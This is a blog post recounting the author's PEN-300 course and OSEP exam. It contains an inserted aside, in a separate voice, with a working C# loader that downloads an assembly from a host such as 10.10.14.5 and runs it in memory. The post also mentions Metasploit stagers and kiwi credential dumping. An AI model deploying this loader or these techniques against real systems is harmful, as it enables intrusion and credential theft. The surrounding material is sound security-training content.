OSEP in 2024
Overcoming another challenge - the PEN-300 course by Offsec and earning the OSEP certificate!
TL;DR: I passed!
The OSEP (Offensive Security Experienced Penetration Tester) is the follow-up to the taste of offensive security that is the OSCP. It builds on the skills learned there and extends them to a Windows-heavy, Active Directory environment where you are tasked not only with standard enumeration and exploitation, but also with evading the antivirus and other endpoint defenses that are actively running on the targets.
My journey on the OSEP started in 2022 when I signed up for Offsec's Learn One deal during their annual Christmas sale, and I started in February 2023. Due to the density and breadth of the course, I thought it would be quite challenging to complete it within the 90-day option, which was why I decided to take the year to learn all the material in the course. I was not wrong.
The coursework was demanding but well-structured. Each section builds on the previous one and encourages creativity in using existing tools and methods to overcome each new challenge. The extra-mile exercises and challenges help consolidate what you have learned by combining the methods taught earlier into new ways of gaining execution.
This course delves deeper into the MSDN documentation, with a primary emphasis on crafting C# code for personalized tooling within Visual Studio. The process was seamless and quite painless. Given my initial lack of familiarity with C#, the opportunity to learn a new language to expand my repertoire is always welcome. Being able to write your own exploitation tools not only helped me understand them in greater detail, but also built confidence in my own ability to adapt existing tools to new uses.
The course centers on mastering lateral movement in an Active Directory, Windows-centric environment, with a heavy reliance on Metasploit throughout. Beyond the essential tasks of obfuscating and creating personalized C# assemblies, I realized, especially during the challenges, that familiarity with Metasploit's diverse modules and payloads significantly reduces the workload in post-exploitation. For instance, the web_delivery module (exploit/multi/script/web_delivery) hosts a short stager script over HTTP and prints the one-liner to run on the target, automating the step from initial code execution to a full-featured Meterpreter session. The kiwi extension (loaded inside a Meterpreter session with load kiwi) provides a quick alternative for dumping credentials from within the session, eliminating the need to drop mimikatz to disk or run Invoke-Mimikatz; note that it still needs a SYSTEM-level session whose architecture matches the host (an x64 Meterpreter on x64 Windows), or the credential dump will fail. Exploring all the options of Meterpreter and msfvenom proved to be instrumental in speeding up my progress during the course.
In contrast to my experience with OSCP/PEN-200 in 2022, the material in this course is notably current, and the instructions are presented with clarity. While there were one or two instances where references to outdated frameworks and tools surfaced, they were tangential and did not detract from the overall learning experience. I believe that Offsec should consider more periodic material refreshes, as encounters with obsolete code or frameworks are a prevalent source of frustration in these courses when they require complex workarounds or are no longer effective.
In the course, exploits are recompiled whenever the situation changes. This approach is not efficient, particularly when minor adjustments such as pathnames are the only variations needed. I felt it would have been more advantageous to teach how to write and compile a versatile executable that takes those variables as input at run time.
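As an added illustration of that point (my own example, not code from the course or from the author), here is the shape such a tool can take: a single compiled .NET Framework launcher whose inputs, the location of the assembly to run and the arguments to hand it, arrive on the command line, so changing a path or host means changing an argument rather than rebuilding in Visual Studio. It assumes the payload is itself a .NET assembly with a static Main; the class and method names are mine.

```csharp
using System;
using System.IO;
using System.Net;
using System.Reflection;

// Added example (not from the course or the author): one compiled launcher whose
// inputs arrive at run time, so a changed path or host never forces a rebuild.
// Assumption: the target file is a .NET assembly that exposes a static Main.
class Launcher
{
    static void Main(string[] args)
    {
        if (args.Length < 1)
        {
            Console.Error.WriteLine("usage: Launcher.exe <assembly-path-or-url> [args passed to its Main...]");
            Environment.Exit(1);
        }

        // The source is decided at run time: a local path or an HTTP(S) URL.
        byte[] asmBytes = LoadBytes(args[0]);

        // Everything after the first argument is forwarded to the loaded assembly.
        string[] forwarded = new string[args.Length - 1];
        Array.Copy(args, 1, forwarded, 0, forwarded.Length);

        Environment.Exit(Execute(asmBytes, forwarded));
    }

    // Reads the assembly bytes from disk or over HTTP, depending only on the argument's form.
    static byte[] LoadBytes(string source)
    {
        if (source.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
            source.StartsWith("https://", StringComparison.OrdinalIgnoreCase))
        {
            using (var client = new WebClient())
            {
                return client.DownloadData(source);
            }
        }
        if (!File.Exists(source))
        {
            throw new FileNotFoundException("assembly not found", source);
        }
        return File.ReadAllBytes(source);
    }

    // Loads the assembly from memory (no copy is written to disk), invokes its entry point
    // with the forwarded arguments, and returns its exit code (0 for a void Main).
    static int Execute(byte[] asmBytes, string[] forwarded)
    {
        Assembly asm = Assembly.Load(asmBytes);
        MethodInfo entry = asm.EntryPoint;
        if (entry == null)
        {
            throw new InvalidOperationException("assembly has no entry point");
        }

        // Main may be declared with or without a string[] parameter.
        object[] parameters = entry.GetParameters().Length == 0
            ? null
            : new object[] { forwarded };

        object result = entry.Invoke(null, parameters);
        return result is int code ? code : 0;
    }
}
```

The same binary then serves every lab host: Launcher.exe C:\Users\Public\tool.exe arg1 and Launcher.exe http://10.10.14.5/tool.exe arg1 differ only in what is typed, and anything that changes per target (paths, listener addresses, target names) belongs in those arguments rather than in string constants that force another compile.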
Moreover, although most topics hold their weight, a few felt misplaced against the cohesive flow of the earlier chapters; the Kiosk Breakouts chapter and the Linux-focused chapters in particular felt disjointed and weaker than those concentrating on Windows environments.
Exam day
The OSEP exam is a 48-hour affair and, knowing this, I tried to get enough rest beforehand but found it hard to sleep. As the exam approached, I logged in early, only to find myself unable to type into the proctoring chat or receive any messages. Despite trying to troubleshoot by restarting the browser or switching to a different one, the issue persisted. With each passing moment of my exam time, a sense of panic began to set in. It wasn't until a bit later that I realized the culprit was an extension in my browser. A big shoutout and thanks to Offsec; my proctor informed me that additional time would be given due to the delayed start of my exam, even though the delay was my own doing.
I found that the exam was closely aligned with the course material, and Offsec did an excellent job of preparing me, especially through the challenge labs, which revisit the content in a more structured manner. If there's one area I felt I could have dedicated more attention to, it would be enumeration and Windows privilege escalation, which seemed a bit under-emphasized in the coursework.
One tool that turned out to be immensely successful for me in the challenge labs and the exam was Ligolo-NG. It offers a very smooth interface for network pivoting as compared to Chisel or SSH proxying. I highly recommend becoming familiar with this tool, as it simplifies many pivoting processes.
Even though I didn't end up utilizing all the scripts and code I prepared, having different methods ready proved to be beneficial during the exam. It provided me with multiple trusted approaches for various actions, preventing the need to scramble with untested scripts or code. I recommend using the challenge labs to practice and refine your skills. There was a point where I got stuck and had to resort to using untested code and methods, and that was not a pleasant experience.
I did not get much sleep during the exam period; even though I lay in bed, I think I was too wired to sleep, and I ended up with only about nine hours of rest over the 48 hours.
It took me a day and a half to accomplish my exam objectives, and I spent the rest of the time attempting the other machines. I spent the next day writing my report and I submitted it on Friday.
It was a long and agonizing wait, because I was sure my report was not detailed enough, but I finally received the results two business days after I submitted my report.
What an exhilarating feeling that was! A year's worth of effort finally paying off is always such a sense of relief and accomplishment. I think this course stretched me in a great way, and gave me many new ideas and methods to approach my work in the coming year.
I look forward to more learning this year and I can't wait to put these new skills to work!